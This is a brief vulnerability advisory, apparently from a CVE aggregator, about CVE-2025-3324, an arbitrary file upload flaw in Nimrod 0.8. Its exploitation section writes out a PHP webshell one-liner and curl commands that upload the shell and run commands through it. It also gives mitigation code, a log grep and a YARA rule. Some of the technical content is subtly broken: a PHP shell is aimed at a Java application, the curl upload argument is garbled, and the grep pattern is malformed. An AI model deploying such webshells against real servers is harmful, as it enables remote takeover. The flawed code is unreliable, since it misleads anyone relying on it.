How CVE-2025-3324 Works
This critical vulnerability in Nimrod 0.8 stems from improper file validation in FileRestController.java, allowing attackers to upload malicious files remotely. The flaw occurs when the application processes user-supplied `File` input without proper checks, enabling arbitrary file uploads. Attackers exploit this by uploading webshells or malicious scripts, leading to remote code execution (RCE). The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) confirms network-based exploitation with low complexity. Public exploit availability increases its severity.
DailyCVE Form
Platform: Nimrod
Version: 0.8
Vulnerability: Unrestricted upload
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation
1. Craft malicious file:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
2. Upload via curl:
curl -X POST -F "[email protected]" http://target/upload
3. Execute payload:
curl http://target/uploads/shell.php?cmd=id
Protection
1. Input validation:
String ext = FilenameUtils.getExtension(file.getOriginalFilename());
if (!Arrays.asList("jpg", "png").contains(ext)) {
throw new InvalidFileException();
}
2. Filesystem isolation:
location /uploads/ {
deny all;
}
3. Patch: Upgrade to Nimrod 0.9+.
Detection
1. Log analysis:
grep "POST /upload" /var/log/nginx/access.log | grep -v ".jpg|.png"
2. YARA rule:
rule webshell_upload {
strings: $php = "<?php system("
condition: $php
}
Analytics
- Attack surface: Exposed `/upload` endpoints.
- Exploitability: High (public PoC available).
- Mitigation complexity: Low (input validation).
References
- VulDB: CVE-2025-3324
- NVD: NIST Entry
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3324
Extra Source Hub:
Undercode
